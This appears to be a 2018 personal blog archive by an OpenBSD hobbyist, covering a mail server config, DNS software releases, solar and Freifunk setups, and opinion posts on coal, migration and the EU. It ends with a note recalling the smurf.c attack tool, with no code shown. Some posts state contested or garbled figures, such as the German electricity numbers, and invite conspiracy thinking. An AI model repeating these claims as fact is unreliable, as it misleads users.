listen on 108.61.211.139 port 465 smtps pki mail auth-optional hostname "mail.solarscale.de"
## 2
listen on 127.0.0.1 port 25 tls pki mail auth-optional hostname "mail.solarscale.de"
## 3
listen on 2001:19f0:6c00:9041:5400:ff:fe11:3332 port 25 tls pki mail auth-optional hostname "mail.solarscale.de"
listen on 2001:19f0:6c00:9041:5400:ff:fe11:3332 port 587 tls pki mail auth-optional hostname "mail.solarscale.de"
listen on 2001:19f0:6c00:9041:5400:ff:fe11:3332 port 465 smtps pki mail auth-optional hostname "mail.solarscale.de"
# and on the despammed port
listen on 127.0.0.1 port 10025 tag DESPAMMED hostname "mail.solarscale.de"
table aliases file:/etc/mail/aliases
table users file:/etc/mail/smtpusers
table domains { "centroid.eu", "solarscale.de", "virgostar.net", \
"schweinfurtdating.de", "dtschland.eu", "goldflipper.de", \
"freifunk-schweinfurt.de", "delphinusdns.org", "enhancedrisc.de" }
smtp max-message-size 90000000
action "mbox" mbox virtual <users>
action "spampd" relay host smtp://127.0.0.1:10024
action "local" mbox alias <aliases>
action "relay" relay
match for domain <domains> tag DESPAMMED action "mbox"
match for domain <domains> action "spampd"
match for local action "local"
match for any action "relay"
# end
So as you can see it's much smaller as it makes use of tables. If you do
notice something wrong with this config please leave a comment and let me
know. Or email me at centroid.eu. Thanks!
PS: relaying to another host with self-signed certificate may mean I have to
no-verify something. Let me know if you know better.
We know! or More Boogyman stories from the NSA
June 27th, 2018
In this telepolis article (german)
the message is reiterated. Yes the NSA is still listening. Great! Didn't
we already have confirmation of this in 2013, with the Snowden revelations?
I'm not sure that US President Trump is doing anything regarding this, at
least I haven't heard of this. What do you do when you are under control such
as the NSA? Ignore it. That's all I can conclude right now. Do what you're
doing and know that if you do anything illegal over a wire, every bit is
registered somewhere. I don't do anything illegal because I know this.
I'm against surveillance, but I also have my hands tied behind my back. I
can't help the situation any. Have a nice day. Oh btw today is my last
day of sick leave.
scp for skey login
June 28th, 2018
With help from Todd Miller and Darren Tucker who have been very kind in
providing these examples I am finally able to use scp to a skey OTP
system. Here is the syntax:
This brings this years total for F3Netze to 80 EUR. Since I'm entering
unemployment in a few days this will likely be the last donation of the
year.
In a bilingual poetic mood
July 1st, 2018
A Computer is a machine | Ein Computer ist eine Maschine
it does not hate, it does not love | Es tut nicht hassen, Es tut nicht Lieben
it does not strike you lucky | Es tut kein Glueck bringen
all it does is wait for input | Alles was es tut is es wartet auf Eingaben
and then it processes the output | und dann erarbeitet es die Ausgabe
A Computer is not a gambling machine | Ein Computer ist keine Zock Maschine
You don't play games on it for feelgoods| Du spielst keine Spiele damit es dir gut tut
It will suck you in and spit you out | Es wird dich einsaugen und ausspucken
if you don't treat it for what it is | wenn du Es nicht behandelst fuer was Es ist
It is a machine, waiting for programs | Es ist eine Maschine, wartend auf Programme
A Computer wants to be programmed | Ein Computer moechte Programmiert werden
a billion "hello worlds" it is bored of | Eine Milliarde "Hallo Welt" findet es langweilig
It wants you to pick up a book and read | Es will das Du ein Buch Liest
on how to program it with care | ueber wie es Programmiert wird mit Sorgfalt
And then the source code you'll share | Und dann den Quellcode wirst du teilen
Yesterday I bought a used computer
July 3rd, 2018
I bought a used Apple G5 Power Mac for 185 EUR inlcuding shipping. It's
coming from Germany north of here. AFAIK. It'll be here in the next few
days. It has dual CPU, 4 GB RAM and should hopefully run OpenBSD/macppc.
I'd be interested in making it work in 64 bit mode, but we'll see. I bought
this off ebay as a guest and paid with paypal.
Delphinusdnsd now has zinclude's
July 11th, 2018
zinclude is like an include, but it restricts further include's downtree.
It also restricts everything but zone { } declarations hence the z before
include. This I felt was valuable. This bumps the config file version to
8.
In other matters in and around delphinusdnsd I'll likely release 1.3 version
next week. I'll have 1 more round of checking it on other platforms than
OpenBSD and then roll the release. Cheers!
4000 Watthours for the year?
July 16th, 2018
As you know I have a solar panel on one side of my living room windows.
I'm currently at 3500 Watthours consumption or so and I'm guessing I'll
have enough capacity to get past 4000 Watthours by October for the year. The
load on the battery/panel is a 3 Watt Freifunk router. So what is 4KWh's?
About 1 EUR worth of electricity from the grid. The most joyous moment was
getting ~30 days continuous operation centered around the summer solstice.
With better timing on the battery I could perhpas get 45-60 days next year.
Will have to see. The investment of the solar panel at this rate will pay
itself off in 500 years considering I don't move it to a more sunny spot.
Update: below are the users and load of the router where a 30 day sprint
with about 2500 watthours were consumed. In three days I'm turning that
router off, until the battery is recharged fully.
Delphinusdns 1.3.0 released
July 17th, 2018
I have released version 1.3.0 of Delphinusdnsd. I did a short release cycle this time because like told I'm
applying for some funding to work on this. When I'm done with the work the
1.4.0 version will be released. Check the news for official word that 1.3.0 has been released. The SHA256 of the tarball is 17dc9b77810096e646ef5545efed30e1caccf7454b6e425f5db814ecd461ed66.
Enjoy!
Donation time, this time recurring!
July 22th, 2018
I have set up a recurring donation to Theo de Raadt and OpenBSD. The amount
is for 5 EUR every month. At the end of the year, this will give OpenBSD
130 EUR from me, with the money that I've already donated. This is likely
what's coming from me this year as I've fallen on hard times. I'm positive I
can get out of this though and an occasional bonus will make it along with
the recurring donation. Cheers.
64 bit PowerPC
July 29th, 2018
The last few weeks I've been working hard. I'm attempting to make a powerpc64
port for OpenBSD. Whether I'll succeed is written in the future. I've been
fantasizing a little about this, if I succeed the world opens up a bit in terms
of architectures that can be run since the G5 which I'm using as a start, is
a little old.
For example there is the following computers I'd be willing to port to:
Both of these are powerful computers dating back to 2016, so fairly new.
At my last job I registered the domain "enhancedrisc.de" and I feel this is
a suitable page to document my efforts. Visit it here. Wish me luck on the port!
I've switched back to chrome (security de jour)
July 30th, 2018
I've gotten hold of word that chrome is more secure than firefox, due to
being able to be pledged and unveil'ed properly. So I've switched to this
for now. It's a bit faster than firefox anyhow.
Applied for the grant
August 1st, 2018
I have applied to the grant from prototypefund.de. Their registration period
is from now until September 30th. Then I hope I'll be selected to do 6 months
coding on delphinusdnsd. I can get up to 47K EUR, but I likely won't get that
much as those are team efforts. Still a nice gesture from the german
government to pay open sourcers. Until the decision is made, I'll be working
on powerpc64 port and hopefully get a booting kernel, but who knows.. there is
several areas that can go wrong. My biggest problem is having to teach myself
powerpc asm (for 64 bit). But I have books that I can fall back on.
Happy 80th Birthday Mom!
August 4th, 2018
My mother is turning 80 in a few days. I want to wish her a happy 80! When
I look at her life it wasn't easy but we managed to have a lot of fun in our
family. Whether I will be able to live to 2056 and thus 80 years old? Well
we better all have cottages on the moon or something! :-) btw that's 18 years
after the 32 bit time_t wraparound (2038), will we even live through that?
Fixed "OR" searching
August 6th, 2018
A few days ago I noticed that searching "1 2 or 3" would cause the search
to go in an infinite loop. I was able to fix this today. I had reused an
integer that I shouldn't have reused. The code is
updated here.
I don't know how I didn't find it before, very odd. "1 or 2" always worked
though so perhaps that is why.
It's Time! Stop polluting our system!
August 7th, 2018
It's time, we must act now! Put an immediate stop to coal and the combustion
engines! This article (german)
was the tipping point for me. I have long ago decided not to run any more
combustion engine cars and as it looks now I'll not run any car at least until
2020. I have my sights set up on driverles/autonomous cars. You'd think I
was this eco-freak with no car, but I still use up enough resources for 2.2
earths as I still eat too much meat and fish. I recently took this survey
that calculated my footprint, the results are alarming, try it on yourself:
www.footprintnetwork.org.
Also I recently saw the stats of solar and windpower in germany, if we take
coal out of the picture we would be at 2002 levels which is acceptable since
we've had these energy saving bulbs for a little more than a decade now.
See that chart here.
We'll be alright if we put to an immediate stop to coal TODAY! With cars try
to reduce to 1 electric car for every 4 combustion cars. Do carsharing if you
need a transport way and learn to take the bus more! Bussing is excellent here
at least to get downtown, beyond that is sorta hard but not impossible.
Saudi Arabia-Canada spat: who I side with
August 8th, 2018
I side with Canada of course. Saudi Arabia is a regional destabilizer and
I don't understand why Germany even sends them arms for fighting Yemen. It
seems so wrong. In exchange for oil, that heats our planet when combusted
and causes great suffering globally. It is my understanding that if there
shall be an attack on Iran, that I do not want my government to involve
my country. Everything is wrong about Saudi Arabia, I don't wish to ever go
there.
Rented another VPS
August 10th, 2018
I have rented another VPS for 3 EUR/mo. It will be a Freifunk gateway
eventually and thus runs Linux Debian. I haven't run a Linux VPS since
10 years or so.
Ich fordere einen sofortigen Stop der Verbrennung der Kohle in Deutschland
August 12th, 2018
You can't mis-translate this in german. I want an immediate stop of burning
coal in Germany. That's my stance. We can do without coal right now. We
need to turn coal burning off as the climate is out of hand right now. Forget
2% or 4%, we need to end this pollution now!
Stop Coal Now!
August 13th, 2018
2030 vs. 2035
August 14th, 2018
Politicians. They talk as if we have time. We don't have time to afford
outputting coal until 2035. That's the goal for "die linke" party in germany.
This falls short, and die Gruenen (green party) call for an immediate exit
of coal until 2030. This is all political whitewashing. We don't have time.
Either the output of coal is stopped immediately or we'll have to live with
a simmering climate worldwide, which is not an alternative.
Look, humanity
is put to a test here on earth. How well do we protect the earth which is our
means of living right now. We don't have a second planet, nothing is gonna
be alright if everyone gets a 50 dollar bonus. We have to work double to
undo what the last generation has done unto us. They sleep walked us into
catastrophy, and they keep telling us the lies that they were taught via
mass media, in order to produce for maximum profit. They sold us all.
Please make me benevolent eco-dictator so that I can cut coal immediately.
Let the people fix the fluctuating electricity grid. Solutions will be found
when there is problems. Ie. if the grid cannot take a reduction of produced
electricity, we'll get brown outs first. Once we get brown outs let the people
know to conserve energy. We've had energy saving bulbs for over a decade now.
They are cheap enough that everyone can outfit their home with these, if they
haven't already replaced incadescends completely. As people re-regulate their
energy consumption the grid will become stable again.
The worst case scenario is to have people buy air conditioning for their homes
over the timespan of 12 years of heatspells to come. It'll make the problem
acute. Trust me, I've seen the numbers. Germany has hit a peak with green
energy and you have to compare the trade off. Ie. 1. do you invest in green
electricity (PV solar, wind) with higher importance and steepen the curve of
electricity produced? Or 2. do you immediately jump to point X and get rid of
coal, and let the people figure out the problems that arise at hand? The
former (#1) will only cause electricity being dumped into other european
countries at negative costs (we'll pay them to take our electricity) which is
ridiculous! That's happening right now and can't be the status quo forever.
I've seen the numbers! Germany produces twice as much electricity as the
demand is locally. We produce 200 GW of electricity in 2018 and the demand is
for 80 GW. We can cut coal immediately and only have to invest in storage for
the PV produced so that we can replay it into the grid at peak times. This
may mean batteries in every home. Electric cars that are on this grid can
help too. My situation right now is that I have 10K EUR available for anything
that I wish to buy. Only thing stopping me from buying batteries for the
common good is the laws and bilaws and economic incentives that are lacking.
ie. Electricity should be dynamic. If I can charge batteries at 12 noon at
4 KW per hour and discharge these same batteries into the grid at 4PM at 3 KW
per hour, then we've solved the peak demand problem. We've shifted electricity
over a time window. Only I want incentives. I want to buy this electricity
at 10 cents per KWh and sell it at 29 cents per KWh. I make a profit. That
profit goes back into the batteries which don't have a limitless
charge/discharge life. So in 10 years time I can replace those batteries with
new batteries and by then the energy market will have caught itself.
Another obstacle I face is where to put the batteries. I have space in my
house on the balcony. My landlord will have to give me the permission to do
this. I am willing to bet there is many people in my position with a few 10K
sitting around and they'd invest, if they only could. But they're not given
the word, or incentive so you won't see help from us. You could stem the
problem without coal if you involve everyone.
Anyhow unless die linke drastically changes their coal goals (2035 is too
far off in the future) I'm going to be voting for the greens next election.
Because I'll take 2030 over 2035 any day, but I'd much rather do it now! Any
party coming along doing the now I'll vote for, except the AfD. Are you
willing?
Deutschland ist eine Drehscheibe
August 16th, 2018
This means literally translated that "Germany is a Swivel or Wheel". What
this means is that migrants who come here, often don't stay, but go on. It
also means that locals who were born here will likely leave, and maybe return.
I fit into the latter, only I returned. Will I stay much longer? It depends.
From my perspective, everyone is trying to come here. Germany is a destination
for migrants and refugees because we are the strongest economy in europe. This
means nothing to me because I have very little from this economy and even
when I was working remotely via the Internet I was tapped into the north
american employment market. I don't feel threatened by migrants or refugees,
in fact I fully support a few things. 1) Treat them like humans, give them
shelter without crowding them 2) don't be overly complicated, cut the
bureaucracy, 3) profit by involving them on the job market. The people
coming here want work, honest to god work.
So let them build housing, Germany needs housing because more refugees are on
their way, we also don't have a lot of space so the housing will have to go
into the vertical (highrises). This paints a dreadful picture over the
Germany we want to know. Ghettos. Perhaps we can space these highrises out
so that they aren't noticeable too much, don't clump them together. Migrants
who come here probably don't have the skills to build a high rise, but with
the oversight of a master builder and architect their work should not be in
vain. Payment should be what the going rates are for builders.
Remember Germany is a swivel, not a homeland. What destinations
are going to be on the order for germans who were born here? I can think of a
few. Iceland, Scotland, north of Norway, North of Sweden, Finland, Greenland,
Antarctica. These are all very cold destinations. But they will be warm enough
in the future after the heatspells we're getting. The migrants from Germany
will be climate-refugees, and will build communities where it's cool enough
to live. Communities may be called Neu-Schwarzwald, Neu-Berlin, Hoffnung.
Now the communities who will see influx will either 1) Not want to join the
EU, in order to disallow easy migration, 2) Not allow migrants to arrive
there. It's the same story we're seeing now on
our level. It's only right that remote northern communities allow climate
migrants to enter as a human right. Take it from the birds who nest in the
arctic and who return home during winter, or is the arctic their home? We're
all humans and heat is forcing us to move. Plans should be made for that,
land must be purchased and communities started. It's an Exodus (movement of
Jah people).
To sum up. Everything is on the move now or will be on the move in the future.
Noone will remain where they were born, and thus have no right (no god given
right (anspruch)) over their birthplace. Hey we're all refugees, it's just a
matter of what style you wish to migrate in. Do you prefer a rubber dinghy
crowded with 120 people or are you going to migrate in a Jumbo airliner? First
class perhaps? How much money do you have? What is needed for the pioneering
work up north or in antarctica? This is the last frontier and our only hope
to live in relatively cool environments. The people are changing, the earth
is changing and we need to adapt. Birds have adapted all along. We should
take by their example.
New Keyboard
August 18th, 2018
I got a new keyboard after my old workstation keyboard gave up its ghost.
Problem is that this is a USB keyboard and not console keyboard, oh well.
The above string configures the keyboard, I put this in my .xsession file.
My battery powered Freifunk Emergency setup
August 18th, 2018
I have finally set up my Freifunk Router with the newly purchased Vodafone
Gigacube. The gigacube is an LTE router with 50 GB volume per month. It is
on a flex plan so when I don't use it (I keep it off until I need it) I don't
pay. I tested this setup on the battery just now and it works brilliantly.
I have made you some photos:
I'm very excited right now. The two of them together suck about 8-10 watts
but the sun was shining on the panel so perhaps it wasn't all battery suckage.
I think I was censored in comments on Heise Online
August 23th, 2018
This article used to list the people that were
chosen for the "digital counsel" for the german government. They used to list
them by name and profession and I commented that these were only
"social winners" ie. they were bosses, professors, company founders, scientists
basically everything the academia and industry has in store. But they lacked
the normal person, the hacker, the social loser. So it's a biased counsel.
I commented that they did not chose someone who walked through the darkness,
but they want that this counsil places difficult questions. Good luck! And
boo for the censoring. Not too much disappointment in this, can't be much
more disappointed in our government than already.
Disabled HT on mercury(computer) this morning
August 24th, 2018
This
message made it to my inbox this morning. I have one more computer where
I can't turn HT off because it's a mac mini and I don't know how. Basically
Hyperthreading/SMT is bad because it can be abused to read memory that is
as I understand it remaining in the CPU cache of other processors. Turning
SMT/HT off is a safety precaution. Since most of my computers are either
off or idle anyhow this does not affect my experience with them, and if I
want to do computing intensive tasks I may consider getting a GPU to do that
for me. It all depends. My network here at home is real boring.
Why I (seemingly) left Freifunk Franken
August 25th, 2018
In 2014 I joined Freifunk Franken and it gave me a new direction of what
could be done with a wifi access point. I had believed that everyone should
do this too, but it was obvious after several attempts in 2016 to contact
neighbours that noone was interested in setting up a network even if I funded
it for them. Back then we had the so-called
Störerhaftung, so a law that explicitly forbid sharing your access point.
I personally felt involved by signing countless petitions to end this.
Freifunk was at the forefront of fighting the störerhaftung with the
portal freifunk-statt-angst.de. Well then in 2017 the law was dropped. We
won. But we were left with a system that was now outdated. Gateways, tunnels.
All nicely channeling packets into foreign countries to avoid a law that was
now non-existent.
Instead of discontinuing the centralized tunneling part Freifunk Franken
embedded itself into a network of gateways and tunnels, and the leaders who
ran these mostly founded an association called F3Netze to give each and every
one of us a membership. However this was stalled with laws and lawyers who
put forth topics like data protection laws yadda yadda. I never joined F3Netze
because I was confused as to its purpose. Instead of decentralizing it
unified but centralized us, in my opinion. I participated in what's called
a mumble yesterday which is sorta like a telephone conference, only better.
But I did not _really_ like what I heard coming from one end of the line.
We were told we must give new users a Pico Peering Agreement (which I have maybe
read once but totally forgot what it says), and then there was mention of
a "memorandum of understanding", which I didn't read at all. Finally someone
pointed out that the gateways, tunnel endpoints all hold the powershare in the
unification of Freifunk Franken and thus there is a power vacuum with users.
That's how I understood it anyhow. I tried to tell everyone that we're on a
path that leads us to the bleeding edge of a razor and it may hurt us and we
may disband because of these ambitions that were totally new. In fact when
you talk around something you don't understand and one person is trying to
push it through even though you don't understand it, it's called spin mastery.
I felt spin-mastered somewhat and I didn't like it. So I decided that I want
a hotspot above all at first and not give anyone a pico peering agreement and
a memorandum of understanding either. Not that I had to, noone in this
neighbourhood cares.
I'm sorry, I wished I could be part of a community but I feel pushed out. So
I'm gonna do my own thing again and if someone comes up with a freifunk node
in my neighbourhood perhaps we can make a pico peering agreement and share
the wireless ether. Freifunk Franken was great in opening my eyes in what
technology can do, and that's why I have flashed my routers to an openwrt
image instead of a FFF image. In the following months I'm going to make a
tunnel myself (it doesn't cost much now) and offer people Internet too.
It should also be said that my purpose was to install a network that is
resistant to power outtages. My setup is powered by solar and it will
continue doing that. Just not with the SSID freifunk.net. I also don't
have soooo much time that I could help the community much, anyhow. You're
better off without me, I feel. So long, and thanks for all the fish.
I firmly believe the sad situation of laws on German and European level failed
us. We don't need more laws, we don't need threats of any sorts of
liabilities, or data protection laws. If you think that I'm spying on you
because you use my hardware and the software is misbehaving and I'M debugging
it with tcpdump you're wrong. Come up to me and talk, send me an email and
discuss. We don't need a law around this. In the end this is all perhaps
FUD and I feel I'm a victim to it.
Got another VPS
August 27th, 2018
I have renamed usw.freifunk-schweinfurt.de -> upsilon.virgostar.net and put
OpenBSD 6.3 on it. I also got a new VPS in finland with the same hoster,
hetzner online. This new one is called tau.virgostar.net. Also OpenBSD 6.3.
I now have five VPS's of which I will get rid of one at the end of its billing
cycle. That one is psi.virgostar.net and it's FreeBSD in Toronto. It has
about 2 more months left worth of operations. So I can count all my vps's on
one hand per finger, omega, psi, phi, upsilon, tau. I intend to make tunnels
from home again and have a routing algorithm that dishes routes out to omega,
upsilon and tau from phi. I'll probably make a random source hash routing
algorithm with pf. The latency from home to tau is 30 ms. And if I keep
everything below 60 ms before I exit my tunnel network it'll be great. It's
great that I can play with lots of hosts now for little money.
Very convenient.
My Hotspot is alive
August 28th, 2018
Last Friday/Saturday I had a conflict of interests with Freifunk's proposed
direction and I felt it was best to just do my own thing for a while. I have
reflashed my routers to OpenWRT and have configured wireguard on one. It's
a TP-LINK 1043ND v4. Today I made the password public by putting it in the
SSID of this router. Everything goes through the wireguard tunnel to sweden
and better yet it's all encrypted. So there is full WPA2 encryption to the
router and from there through the tunnel to sweden and into the Internet.
I am making use of the law that removed the Störerhaftung and I timed
a download and it came out to 7 Mbit/s. This is fabulous! Just what I wanted
to give out to this hotspot. So far I'm very pleased. I do hope nothing
causes me to get on the radar of evil people with this but who knows? It's
a hotspot. When the time comes, and someone in the neighbourhood gets freifunk
in my reach, then perhaps I'll go back to freifunk. Until then there is no
point in having a mesh, it's an island, it used the uplink to connect to the
freifunk network, so really useless rather. Looking forward to the future.
September Stroll
September 5th, 2018
Congratulating the 1/4 American Facebook Deleters
September 6th, 2018
Congratulations! You're perhaps over 60 million strong when I do
a crude estimate of 18's and over. I left facebook in 2011 and am glad to have
done so. What do I do to fill the void in time? Boredom perhaps :-).
Mr. Seehofer I disagree, root cause is the EU
September 6th, 2018
In politics, Mr. Seehofer the Minister of Interior of Germany said quote
"Mutter aller Probleme ist die Migration" (Root cause of all problems is migration). This
is so wrong. Not just because I'd like it to be wrong, no. It is the EU and
a relatively good economy that is the root cause of all problems. Why is it
that Russia is looking to the EU with a distaste? We're doing well, we have
a great free trade zone amongst all EU members, and everything we could ever
want is produced here. Except one thing, personelled space products, like
crew modules for space stations, or crewed orbiting capsules. Now because
we "have everything" we are the scorn of all people who have less. Africans
have figured out that there is a backdoor, and they're using it. The Russians
are rattling our front doors with military might displays. The British who
are weakening the EU by leaving are perhaps doing us all a favour by weakening
us. And the Americans are possibly sleeping on what's happening. They have
their own problems and have said this all along. Their new involvement seems
to be Poland and the baltic states while leaving Germany permanently.
So has the EU ever heard of sharing? Or are we the greedy Europeans who don't
care what happens a continent away in Africa. It is proper to share your
wealth. While individually in Germany we may not have much but when we combine
efforts (as we do) we have a great deal and a great deal more than any African
nation could make up. If I was the African Union I'd put a carbon tax on
Europe for all the cars that pollute the worldwide atmosphere. Pollution of
the atmosphere is not bound by borders, it affects all. Then there is the
tax to keep the backdoor closed. Sorry that's extortion. Yes damn right.
We're being extorted, until the African can stand eye to eye to a European in
wealth. This is just how it goes, noone said the world was fair. We are after
all a global community, aren't we? Should a brother in Africa starve while we
use up global resources in splendor? Or should we be sharing our wealth? If
brother is happy, we're happy.
Do we need to make a choice between EU and Internet?
September 13th, 2018
Who would win? The Internet or the EU? The EU has a plan for everything
European. The Internet proves as disruptive in their eyes, it seems.
While I don't want to focus on the "Upload-filter" too much, I see it a
little as a mass-censorship against the citizens of the EU. Question
remains, would europeans give up the Internet for the EU, or would europeans
give up the EU for the Internet?
Outlook on my participation in the upcoming Bavaria Election
September 16th, 2018
I'll likely vote Greens this term. Even though I'm a devout Die Linker, I do
believe Die Linke is not extreme enough when it comes to the coal-exit. That's
my vote. I am surprised that the Greens have found a niche again, they were
on the verge of dieing it was my perception.
Can they just do with us what they want?
September 20th, 2018
Here is some food for thought. Why is there no left-wing anti-EU party in
the EU? None of the bigger ones anyhow. When the question pops up whether
the EU is really good for us all, it's the AfD who say "well we said it all
along 'raus aus der EU'" and the left-wingers will have drooping faces. It's
not that I would immediately vote for such a party, but it would perhaps be
good to have that option? Because the EU could turn out to be a disaster for
individual people rights, especially when it comes to intellectual property
issues on the Internet. I'm not a software-pirate in fact I almost exclusively
deal with Open Source which makes piracy of that software a non-issue.
I'm unsure if the "Pirate-Party" is left leaning, but noone wanted to vote for
them when I voted for them so their issues were perhaps too early for the
times. They also weren't anti-EU afaik.
September Equinox in 3 days
September 20th, 2018
According to wikipedia the September Equinox is on the 23rd of September at
1:54AM UTC. This is also when autumn officially starts. At least in the
northern hemisphere. Trees are already starting to turn a little over here.
Favourite times.
Alternative fuer Deutschland Criticism
September 20th, 2018
These people supposedly are so smart they are professors and stem from academia.
OK smart people, tell me, what Operating System do you have planned for Germany
because it seems the old conservative route is to go with Windows. I'm going
to try to portray that we are a nation of crack addicts addicted to the Windows
crack. This in itself conditions each one of us to uphold the same old power
structures that shapes thinking and actions. We are not some nation where there
is 1% online and the rest offline. It's more like 85% are online. So what
alternative for Germany are these people giving in terms of Operating Systems?
If it's the same ol', then I wish you good luck. I'll take my hat and walk.
No I'll run. Away from you. Because you have no real solutions.
My frustration with technology
September 20th, 2018
Windows is a pest, And it's also very much expensive. So much that people
can't afford it. Nor can they afford a new AMD computer because their Intel
Core 2 Duos are not supported anymore. People can't afford to buy new
computers, the old will have to do. So other than the fact that you're an
instant hack target and noone wants to work with that, what is Intel and MS
giving the people? I can try to evangelize Open Source as an alternative but
people never learn. I've given up to preach to others to use X systems. Here
in Germany we saw a lot of betrayal where cities and states decided to use
Linux and then changed their minds and used Windows again. Linux people out of
a job again. But that's not the real problem. The problem is that noone will
commit. So good bye. Hey my systems run. If you want me to go through the
complexity of explaining it all to you it'll cost money, and you'll have to
commit to it. Not backstab, like they do.
What my dad taught me
September 20th, 2018
When doing taxes, my dad taught me that the value of office equipment is
stretched over a period of four (4) years. This taught me that office
equipment has a lifespan of around 4 years. Then it's time to buy new
stuff, and this has to be calculated into the business plan from day one.
When I see people using Core 2 Duos still, for work tools, I
keep thinking that the problems stem not from the day they bought
equipment X years ago but that they didn't think of replacing it (X + 4)
years later. I'm totally disgusted by business practices out there. And
I have to pass the buck here, I'm not going to involve myself with this,
let some other fool take the wheel there.
Trivia: Three famous people who went into exile on another Continent
September 22nd, 2018
This was a hard list to create because two were easy and the third not so,
easy. Well here goes:
Emperor Haile Selassie I of Ethiopia, spent five years in exile in Bath,
England
Napoleon of France, spent the rest of his life until his death in St.
Helena, Atlantic Ocean which was closest to Africa or South America.
Fethullah Gülen, is a not so well known person from Turkey who is
in exile in the USA
Dalai Lama of Tibet, while he didn't exile into another Continent (Asia)
it is said that India is a sub-continent, I'll add him here anyhow as the
fourth famous person in exile.
If you know any other figures who are in exile on another continent send a
comment.
Smuggling Politics into a Free Trade Zone (goods, services and values?)
September 22th, 2018
When the EU was formed it was called the EEC as far as I know. EEC the
European Economic Community was a free trade zone among its member countries.
Eventually politics made it into this free trade zone and we have a centralized
police force governed by the EU (EuroPol). Now there is talk of a european
military, and the original free trade zone is overshadowed by the stench of
political values. Where will it end? I for one am growing more and more
distant to the EU. How many laws do we have? I know not one. Why am I not
being taught these laws? Is a single human being even capable of knowing them
all and not be a professor, or professional of law? This is getting ridiculous
I say we need only a blacklist of the most important things that we can't do,
ie. Murder, Steal, Bribe, Libel, and others to sum these up it's called common
sense. Put away the whitelist of the things we can do as they are a given.
Don't make politics too complex or the people will not know what you want of
them. It seems to me the vision of the free trade zone was lost in the need
for values imposed on us the EU citizens. And we don't even know the laws of
which we're constrained with. Only until we're charged in a court of law.
Pathetic?
Trusting Letsencrypt?
September 24th, 2018
Recently it came to my attention that paypal has pulled out of business with
Alex Jones of infowars.com. I don't necessarily agree with him 100% and maybe
not even 50% but I do recognize that he's being censored, and how easy
american corporations have the authority to ban someone.
This story made me think of letsencrypt. Because I was looking for a
what's the catch scenario. And I found it I think. Let's encrypt is mostly
american corporations who are its sponsor as told at
https://letsencrypt.org/sponsors/. I always thought they were google and
perhaps I'm not wrong. Anyhow. If you get in trouble with an opinion that
americans dislike (like alex jones) what are the chances that they'll revoke
your TLS certificate? You're basically unable to do business online anymore
at that point, and wide open to spoofery and forgery.
Freedom it seems has a price after all. Now I'm a little uneasy going with
letsencrypt for this website because there is really no choice. There is no
other service that compares. I'll try it though. In a few weeks when OpenBSD
6.4 comes out, I'll be making steps to encrypt this website with the
acme-client. It'll be interesting how that will work out. Not my first time
working with letsencrypt but first time with acme-client. As a final sentence
I'd just like to say "keep looking for the conspiracies out there", maybe
someone will find something.
Zitis is going to use a quantum computer
September 27th, 2018
In this link (german) from heise.de, Zitis announces that they are going to use a quantum computer to crack Internet cryptography. This doesn't surprise me. If the germans
are doing this, the Americans are probably already there at 10x the budget, so
6 billion USD perhaps. It's hard to tell how many black budgets the USA have.
We know that IBM, D-WAVE, Google, Microsoft and others are working on quantum
computers. So is NASA and other government contractors. Soo. It may not be
possible for a million classical computers to crack your crypto, but the
government can. Or if you dish out 20 million dollars for a D-Wave. How does
that make you feel? Personally it makes me feel shitty. As the government
is a data whore, they take any piece of information they can. At least here.
Where is the privacy? And what makes anyone so sure that high crime isn't
going to buy their own quantum computer? Or maybe they already have that.
I'd like to make you aware of a post-quantum cryptography RFC that has hit
us already it's called RFC 8391.
Arjen Kamphuis missing in Norway
September 27th, 2018
If you didn't hear of this, here it is. A computer security researcher has
gone missing in Norway. Here is what I heard about him. He worked for
wikileaks once and thus could be seen as a threat to the western establishment.
He did appearances/speakings with William Binney an ex-NSA intelligence officer
who turned whistleblower. Who knows what sorts of enemies he made. I believe
he went missing 4 weeks ago, near Bodo (sp) in Norway, he was on his way to
Trondheim to catch a flight to the Netherlands (which is his country of birth).
He rented a folding kayak, and last week his belongings were found in the
bay or fjord near Bodo. It was claimed that he was not suicidal. Norway
reported that his cell phone was turned on for 5 seconds near Stavanger which
was 1700 km away, but there is room for error so this wasn't reliable. The
Netherlands dispatched two criminal investigators to Norway to help the search
effort. That's all I know. I hope he's found.
In other news, Wikileaks founder and lead Julian Assange is no more the lead
person for the Wikileaks organisation.
Starting from the very top, Germany has no IT plan
September 29th, 2018
I write this to you because I'm distraught about the future of IT in Germany.
Simply put, there is no plan. So there isn't even a plan B. It seems that
everything that even closely resembles a plan is 2-4 years years in the making
and lacks any kind of long term commitment. On top of that I predict machine
learning and artificial intelligence will succeed IT workers jobs in roughly
a dozen years. That doesn't mean that all IT workers will lose their jobs
immediately, but the easy to pick fruits are going then. Eventually even the
"remote hands" are going away as a robot will be doing this. So what's the
plan? There is none. Germany's plan is akin to a crack addict waiting for
the next hit coming from silicon valley and Redmond. We have an eroded
computer culture and anyone who even strives to have a bit of clue is toiling
with the waste-of-time linux OS. Open source is great, but if you're not
even sure with what language you want to program in, you'll never get beyond
a few hello worlds.
There is probably people working on something. yadda yadda yadda. BTW Germany
when are you going to stop being an Internet spying whore?
Registration period for the Prototype fund has closed
October 1st, 2018
This has been the longest wait for me. I'm curious whether I got it or not.
I'm unsure when they'll give word, I'd expect them to say something in the
near-future. Tomorrow I'm going to the (Un)Employment office and give them
my resume, and talk a little, I guess they want to know more about me. So I
hope it won't come to a showdown to any prospective jobs and prototype fund.
I can't really wait, I need employment again soon.
Turned up the heat for 2018/2019
October 3rd, 2018
Yesterday I turned on the heating units but it seems they aren't fully
charged today, yet.
Much like 2 years ago we've had a hot summer but it's time now to heat.
Funny thing about turning on the heat I noticed I didn't turn down the units
properly in spring, or someone was in my apartment, or they automatically turn
themselves to an on level. Oh well, tomorrow I expect everything to be
rather cozy. Today is a holiday, day of reunification in germany. Happy
Holiday!
Changed DNS Server
October 4th, 2018
You may have noticed I changed the DNS server psi.virgostar.net to
tau.virgostar.net. Tau is in Finland, psi is in Canada. I'm going
to expire psi in 2 months or so. So for now it idles.
On October 11, smurf.c turns 21
October 5th, 2018
I missed its 20th anniversary. But here goes (I just found the source to this
again):
* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
Released on October 11th, 1997. I knew TFreak (RIP) back then, he was
untameable, in this sense. He was a wunderkind with code, it was a pleasure
learning from him even though he was 5 years younger than I, it's a sad thing
that he died roughly 13 years after writing smurf.c. TFreak always wanted a
geek shirt made with:
# no ip directed-broadcast
which is the Cisco command to prevent pinging broadcast networks, which turns
